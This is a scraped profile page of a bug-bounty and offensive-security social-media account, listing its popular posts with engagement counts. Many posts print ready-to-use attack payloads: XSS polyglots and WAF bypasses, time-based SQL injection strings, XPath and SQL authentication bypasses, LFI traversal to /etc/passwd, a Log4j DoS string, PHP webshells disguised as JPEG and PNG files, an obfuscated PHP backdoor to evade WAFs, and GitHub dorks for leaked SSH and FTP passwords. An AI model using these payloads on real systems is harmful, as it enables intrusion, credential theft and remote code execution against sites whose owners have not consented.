Md Ismail Šojal Profile Banner
Md Ismail Šojal Profile
Md Ismail Šojal

@0x0SojalSec

22,446
Followers
4,309
Following
666
Media
24,381
Statuses

Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||

localhost
Joined October 2021
Pinned Tweet
@0x0SojalSec
Md Ismail Šojal
2 years
> Wordpress juicy endpoints #bugbountytips #infosec
53
336
1K
@0x0SojalSec
Md Ismail Šojal
8 months
The new search allows for regex, which means brand **new** regex GitHub Dorks are possible! Eg, find SSH and FTP passwords via connection strings with: /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ #infosec #cybersecurite #bugbountytip
7
321
1K
@0x0SojalSec
Md Ismail Šojal
2 years
Top 15 - Vulnerability Scanners : 🥹⚙️ #infosecurity #Cybersecurite #bugbountytips
27
294
936
@0x0SojalSec
Md Ismail Šojal
1 year
A Chrome extension that keeps track of the injected urls with Blind XSS payloads. #infosec #cybersec #BugBounty #xss
19
239
844
@0x0SojalSec
Md Ismail Šojal
2 years
When you test a Django, Rails, or NodeJs web app try the following payloads in the "Accept:" header. 🥹 Payloads: ⚙️👇 #infosecurity #cybersecuritytips by @SpiderSec
28
229
801
@0x0SojalSec
Md Ismail Šojal
1 year
If you run a bruteforce and notice weird behaviours - like "/admin/" redirecting to / always investigate these. /admin/ /admin/../admin //admin/ /Admin/ /admin;/ /Admin;/ /index.php/admin/ /admin/js/*.js /admin/*brute*.ext /admin../admin //anything/admin/ #infosec
28
175
792
@0x0SojalSec
Md Ismail Šojal
2 years
The best single #XSS vector you'll ever have! Payload : JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
32
185
673
@0x0SojalSec
Md Ismail Šojal
1 year
Huge vulnerable site List [LFI] #infosec #CyberSec #bugbountytips
20
184
663
@0x0SojalSec
Md Ismail Šojal
1 year
Cloudflare, Sucuri, Incapsula real IP tracker :- #infosec #CyberSec #bugbountytips
8
229
664
@0x0SojalSec
Md Ismail Šojal
2 years
You can find deep domains without tools. like this simple dorks :🙃 site:*.site.com -www site:*.*.site.com -www site:*.*.*.site.com -www #infosec #bugbountytip #cybersecuritytips
9
173
644
@0x0SojalSec
Md Ismail Šojal
8 months
50 Top Digital Forensics Tools Network Forensic Tools ⚔️ #infosec #cybersec #bugbountytips
3
159
625
@0x0SojalSec
Md Ismail Šojal
2 years
Mindmaps for bug bounty Hunters, pentesters, and offensive/defensive security Professionals #infosec #cybersec #offensive #defensive
30
216
602
@0x0SojalSec
Md Ismail Šojal
1 year
1:- Use @fasthm00 2:- Import to burpsuite match and replace. 3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080 4:- The Blind xss payload will be added automatically by burp and gospider. Finally:- 4 BLIND XSS REPORTS.
29
236
592
@0x0SojalSec
Md Ismail Šojal
2 years
Cloudflare bypass : "-alert(0)-" : ❌ "-top['al\x65rt']('sailay')-" : ✅ #infosec #cybersec #bugbountytips
20
157
568
@0x0SojalSec
Md Ismail Šojal
1 year
Default credentials 👇⚡️ #infosec #cybersec #bugbountytips
5
187
531
@0x0SojalSec
Md Ismail Šojal
1 year
Log4j 2.16 vulnerability DoS 🫰 - Payload: ${${::-${::-$${::-j}}}} refer to: … #infosec #cybersecurite #bugbountytips
8
167
531
@0x0SojalSec
Md Ismail Šojal
2 years
Top 20 essential tools for Bug-Bounty Hunting 🫰 #bugbountytips #cybersecurity #infosec
11
146
517
@0x0SojalSec
Md Ismail Šojal
6 months
All of OSCP Cheatsheets: 📓📓📓 - - - - - - - - - #infosec
6
189
526
@0x0SojalSec
Md Ismail Šojal
1 year
YouTube Channels for cybersecurity Hacking and Bug Bounty ⚔️ #infosec #cybersecurity #Hacking #bugbountytips #CyberAttack
24
169
496
@0x0SojalSec
Md Ismail Šojal
2 years
Awesome Web Security 💻💻 #infosec #bugbountytips #cybersecurity
11
185
503
@0x0SojalSec
Md Ismail Šojal
9 months
So many beginners ask what to do after finding Subdomains ⚔️ #infosec #cybersec #bugbountytips
6
151
506
@0x0SojalSec
Md Ismail Šojal
1 year
Exploits & Tools Search Engine⚔️⚙️ #infosec #CyberSecurity #bugbountytips
10
187
499
@0x0SojalSec
Md Ismail Šojal
7 months
SQL Injection Cheatsheet Auth Bypass Payloads : ⚔️ #infosec #cybersec #bugbountytips
2
131
494
@0x0SojalSec
Md Ismail Šojal
1 year
You can serve a #XSS payload from a XML file <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html=""> <html:script>prompt(document.domain);</html:script> </html> #infosec #bugbountytips #bugbounty #owasp #Xss
13
150
484
@0x0SojalSec
Md Ismail Šojal
1 year
If you are tired of googling for #BugBounty writeups, I made a little tool that lets you search writeups easily. You can also pull the search data in JSON format if you need it.⚙️⚔️ #cybersecurity #bugbountytips #infosec #offensivesec
17
131
481
@0x0SojalSec
Md Ismail Šojal
1 year
Nmap – Techniques for Avoiding Firewalls⚡️🛡️ #infosec #cybersec #bugbountytips
15
145
477
@0x0SojalSec
Md Ismail Šojal
2 years
Time-based SQLi with two payloads injected in the following headers: 1. User-Agent: "XOR(if(now()=sysdate(),sleep(5),0))XOR" 2. X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z #sqli #cybersecuritytips #infosecurity #bugbountytip
15
157
464
@0x0SojalSec
Md Ismail Šojal
1 year
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes. This will help to bypass WAF and execute PHP reverse shell for RCE. get more detail about this👇. #bugbountyTips #bugbounty .
13
130
467
@0x0SojalSec
Md Ismail Šojal
1 year
Bug Bounty Tip:- File upload to RCE⚔️🛡️ #infosec #bugbountytips #rec #CyberSec
10
136
460
@0x0SojalSec
Md Ismail Šojal
2 years
Testing SQLI in Api's? Always start From : Boolean based >> Time based {"id":"56456"} - OK {"id":"56456 AND 1=1#"} -> OK {"id":"56456 AND 1=2#"} -> OK {"id":"56456 AND 1=3#"} -> ERROR {"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC #sqli #infosec #cybersecurity #bugbountytips
9
119
446
@0x0SojalSec
Md Ismail Šojal
1 year
Admin-Panel Bypass⚔️ XPath Injection ``` ‘ or ‘1’=’1 ‘ or ‘’=’ ‘ or 1]%00 ‘ or /* or ‘ ‘ or “a” or ‘ ‘ or 1 or ‘ ‘ or true() or ‘ ‘or string-length(name(.))<10 or’ ‘or contains(name,’adm’) or’ ‘or contains(.,’adm’) or’ ‘or position()=2 or’ admin’ or ‘ admin’ or ‘1’=’2 ```
9
160
449
@0x0SojalSec
Md Ismail Šojal
5 months
Command Injection - Filter Bypass: ⚔️ #infosec #cybersec #bugbountytip
2
136
454
@0x0SojalSec
Md Ismail Šojal
2 years
Automated blind-xss search for Burp Suite : #xSs #blindxss #infosec #cybersec
7
154
446
@0x0SojalSec
Md Ismail Šojal
1 year
Limiting the google search to only IP addresses bringing interesting results. @0x21SAFE made a web-based tool just for that, you can try it at or #infosec #cybersec #bugbountytips
8
116
457
@0x0SojalSec
Md Ismail Šojal
8 months
Authentication Bypass: ⚡️ #infosec #cybersec #bugbountytips
1
110
445
@0x0SojalSec
Md Ismail Šojal
9 months
SQL Injection in Email Address (username) - by @dimazarno Tips: "injection_here"[at]email[dot]com Bypassing Email Filter which leads to SQL Injection: - #infosec #CyberSecurity #bugbountytips
3
134
433
@0x0SojalSec
Md Ismail Šojal
1 year
Test Cache Poisoning : ⚔️⚡️ #bugbountytips #cybersecuritytips #infosec
7
142
430
@0x0SojalSec
Md Ismail Šojal
1 year
testing 403 bypass..? You found a /wp-admin with 403 status. *) Bypass it using /wp-admin/setup-config.php?step=1 This will allow you to create a database. From here, you can escalate it to any other big vulnerability : #infosec #bugbountytips #cybersec
5
122
419
@0x0SojalSec
Md Ismail Šojal
2 years
Swagger UI LFI Injection by @cycatz LFI Payload: /v1/docs//..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd HTTP/1.1 #bugbounty #bugbountytips #LFI
11
124
426
@0x0SojalSec
Md Ismail Šojal
2 years
WAF bypass payload and detailed explanation by @s0md3v <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1// #bugbountytips #cybersecurity #infosec
31
140
423
@0x0SojalSec
Md Ismail Šojal
2 years
Yet another Account Takeover technique. Separator: email=victim@mail.com,hacker@mail.com email=victim@mail.com%20hacker@mail.com email=victim@mail.com|hacker@mail.com Array: {"email":["victim@mail.com","hacker@mail.com"]} #infosec #bugbountytips #cybersec
15
123
422
@0x0SojalSec
Md Ismail Šojal
2 years
Bypassing most FILE Uploads filters by @0xsapra * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #infosec
17
122
419
@0x0SojalSec
Md Ismail Šojal
1 year
try testing for SQLi Authentication Bypass :⚔️ #infosec #bugbountytips #cybersecuritytips
9
126
413
@0x0SojalSec
Md Ismail Šojal
1 year
Small tool to Grab subdomains using Shodan api. . #infosec #bugbountytips #cybersecuritytips
2
124
412
@0x0SojalSec
Md Ismail Šojal
1 year
You can find deep domains without tools like this simple dorks: ⚡️ site:*.site.com -www site:*.*.site.com -www site:*.*.*.site.com -www #infosec #cybersec #bugbounty
14
108
410
@0x0SojalSec
Md Ismail Šojal
1 year
WAF always deletes your backdoor? try this to bypass it: <?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]); #infosec #bugbountytips #cybersecuritytips
18
145
396
@0x0SojalSec
Md Ismail Šojal
1 year
Account Takeover of every user 1) go to forgot password 2) capture Request in a burp 3) change referer link into my burp collaborator link 4) got http request with Password reset token link of a victim #infosecurity #bugbountytips #CyberSec
12
94
399
@0x0SojalSec
Md Ismail Šojal
1 year
Search in github repo for creds/apikey/secrets using nuclei template CMD : "git clone | nuclei -target ./ -t ~/Desktop/secrets-in-files.yaml" #infosec #bugbountytips #CyberSecurity
17
127
394
@0x0SojalSec
Md Ismail Šojal
1 year
how to use encodings in <a>. what symbols in which points you can inject to bypass WAF, filters, sanitizers. ⚔️ #infosec #CyberSecurity #bugbountytips
3
139
387
@0x0SojalSec
Md Ismail Šojal
8 months
Again Best Checklist IDOR: ⚡️ #infosec #cybersec #bugbountytips
1
105
386
@0x0SojalSec
Md Ismail Šojal
1 year
This OneLiner extracts all API endpoints from AngularJS & Angular javascript files.⚡️ curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u #infosec #cybersec #bugbountytips
8
128
378
@0x0SojalSec
Md Ismail Šojal
2 years
MySQL Blind (Time Based) Payload list: #bugbountytips #infosec #cybersecuritytips #sqli
10
128
384
@0x0SojalSec
Md Ismail Šojal
2 years
Recon Methods:- Part 1:- Part 2:- Part 3:- Part 4:- Part 5:- #bugbountytips #infosecurity #cybersecurity
12
150
375
@0x0SojalSec
Md Ismail Šojal
1 year
Google Dorks CLI For Subdomain Enumeration. 🤠 #Feature : Bypassed Page Filter :) #infosec #cybersecurity #bugbountytip
7
113
372
@0x0SojalSec
Md Ismail Šojal
2 years
Blind SqLI Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR' #bugbountytips #infosec #CyberSec
13
95
364
@0x0SojalSec
Md Ismail Šojal
1 year
File upload WAF bypass : by @0xJin /?file=shell.php <-- Blocked /?file===shell.php <-- Bypassed #infosec #bugbounty #bugbountytips
8
94
356
@0x0SojalSec
Md Ismail Šojal
2 years
List Of bug bounty/Crowdsourced security platforms : #bugbounty #offensivesec #infosec
9
120
349
@0x0SojalSec
Md Ismail Šojal
5 months
403 Bypass list by @jhaddix Url Manipulation Methods Top 77 ways to bypass access control ⚔️ #infosec #cybersec #bugbountytip
2
110
357
@0x0SojalSec
Md Ismail Šojal
5 months
Penetration testing tools 📔 by : Cybersecurity insights
1
76
352
@0x0SojalSec
Md Ismail Šojal
2 years
SQL injection Oneliner: $ subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt Always remember, oneliners don’t replace manual hunting.🔥 #sqli #infosec #bugbounty
11
121
353
@0x0SojalSec
Md Ismail Šojal
1 year
Burp Suite Secret Finder - Burp Suite Extension To Discover Apikeys/Tokens From HTTP Response⚡️ > #bugbounty #cybersec #bugbountytips
15
100
348
@0x0SojalSec
Md Ismail Šojal
2 years
How to find authentication bypass vulnerabilities. Focus. I Added headers. by @jae_hak99 Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized Request GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found #bugbounty
9
111
347
@0x0SojalSec
Md Ismail Šojal
1 year
Find SSRF on all your huge target list via httpx:- 1:- Download 2:- Add on {target} 3:- Run httpx. httpx -paths ssrf-parameters.txt -threads 200 -o ssrf.txt 4:- Screenshot the result gowitness file -f ssrf.txt #infosec
13
126
339
@0x0SojalSec
Md Ismail Šojal
1 year
XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization #infosec #XSS #cybersec #bugbountytips
1
112
345
@0x0SojalSec
Md Ismail Šojal
1 year
#SSRF Payloads for LFR/LFD file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ SSRF POLYGLOT file:///etc/passwd?/../passwd #infosec
5
129
345
@0x0SojalSec
Md Ismail Šojal
1 year
#oneliner ✅ Subdomain enumeration ✅ Full port scan ✅ HTTP web server detection #security #bugbountytips #portscan #subdomain #chaos
9
85
340
@0x0SojalSec
Md Ismail Šojal
2 years
Cloudflare #XSS WAF Bypass. Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F #bugbountytips #cybersecurity #infosec #xss
22
132
332
@0x0SojalSec
Md Ismail Šojal
2 years
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload. echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png #bugbounty #infosecurity #cybersec
9
107
322
@0x0SojalSec
Md Ismail Šojal
1 year
Easy short Xss Tips ⚔️ 1.⚙️Subdomain enumeration 2.⚙️S3 bucket with access denied 3.⚙️Ffuf found -> /cdn/ 4.⚙️Ffuf found -> /cdn/proxy.html 5.⚙️blank page -> view source, found url param (document.location) 6.⚙️?url=javascript:alert () XSS popped up ⚙️ #infosec #cybersec
7
80
327
@0x0SojalSec
Md Ismail Šojal
1 year
I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1 #infosec
17
81
329
@0x0SojalSec
Md Ismail Šojal
7 months
Subdomain Takeover oneliner ⚔️ #infosec #cybersec #bugbountytips
1
88
318
@0x0SojalSec
Md Ismail Šojal
8 months
OSCP Cheatsheet 📓 This cheatsheet as part of OSCP preparation.) - #infosec #pentesting #redteam #cybersecurity
6
126
315
@0x0SojalSec
Md Ismail Šojal
2 years
Malicious File Upload:🫰 Read For More: #cybersecurity #bugbountytips #bugbounty #infosec
16
115
315
@0x0SojalSec
Md Ismail Šojal
2 years
LFI - RCE #LFI `..\..\..\..\..\..\..\..\etc/passwd` #Exploitation 1. Log injection -> <?php system($_GET['cmd']); ?> #Code injection 2. LFI ..\logs\log.txt This include(..\logs\log.txt) -> Execute the PHP code -> Code injection. RCE🤏
14
95
312
@0x0SojalSec
Md Ismail Šojal
2 years
Add to your list #SQL #injection payload By @lu3ky13 1%27/**/%256fR/**/50%2521%253D22%253B%2523 == "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z", === query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login == ' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
9
103
314
@0x0SojalSec
Md Ismail Šojal
1 year
Did you know the shortest #payload to achieve code execution in #PHP is only 15 bytes long ? If you can inject it in a page on the site you will achieve remote code execution! This is really useful in #BugBounty or #pentest when you have a limited input size. thread👇
9
85
313
@0x0SojalSec
Md Ismail Šojal
5 months
RCE vulnerability checklist 📔 #infosec #bugbountytips #cybersec
5
107
319
@0x0SojalSec
Md Ismail Šojal
1 year
E-mail address payloads📓 The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems. 1/.XSS (Cross-Site Scripting): test+(<script>alert(0)</script>)@example.com test@example(<script>alert(0)</script>).com "
17
124
313
@0x0SojalSec
Md Ismail Šojal
2 years
WAF Bypass During Exploitation Of File upload Fire /?file=shell.php <-- Blocked /?file=shell.php.jpg <-- Blocked /?file=shell.php5 <-- Blocked /?file===shell.php <-- Bypassed 200 OK #infosecurity #bugbountytips #security #waf #bypass
6
78
311
@0x0SojalSec
Md Ismail Šojal
7 months
S3 Bucket Recon Method ⚔️ #infosec #cybersec #bugbountytips
3
98
310
@0x0SojalSec
Md Ismail Šojal
6 months
Captcha Bypass⚔️⚔️⚔️ #infosec #cybersec #bugbountytips
2
91
300
@0x0SojalSec
Md Ismail Šojal
11 months
List of GitHub Dorks for bug bounties . like Finding target Files, Languages , API Keys, Tokens,Usernames,Passwords,Information using Dates,Extension 📓 #infosec #cybersec #bugbountytips
5
102
294
@0x0SojalSec
Md Ismail Šojal
8 months
403 Forbidden bypass 🫰 GET /admin = 403 Forbidden GET /random-dir/../admin = 200 OK Cloudflare IP Restriction bypass 🫰 GET /admin = Error 1006 (Cloudflare) GET /admin? = 200 OK #infosec #cybersec #bugbountytips
1
54
293
@0x0SojalSec
Md Ismail Šojal
1 year
Bug Bounty mind maps collection:-📓 ⚡️ - - - - - #infosec #cybersec #bugbountytips
8
124
290
@0x0SojalSec
Md Ismail Šojal
2 years
Bypass File Upload Filtering : In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #infosec #cybersecuritytips
3
102
290
@0x0SojalSec
Md Ismail Šojal
1 year
Find hidden params in javascript files assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"
9
86
290
@0x0SojalSec
Md Ismail Šojal
2 years
extremely useful when pentesting APIs. by @CristiVlad25
7
99
290
@0x0SojalSec
Md Ismail Šojal
2 years
Here's a small #XSS list for manual testing (main cases, high success rate). "><img src onerror=alert(1)> "autofocus onfocus=alert(1)// </script><script>alert(1)</script> '-alert(1)-' \'-alert(1)// javascript:alert(1) Try it on: - URL query, fragment & path; - all input fields.
14
88
289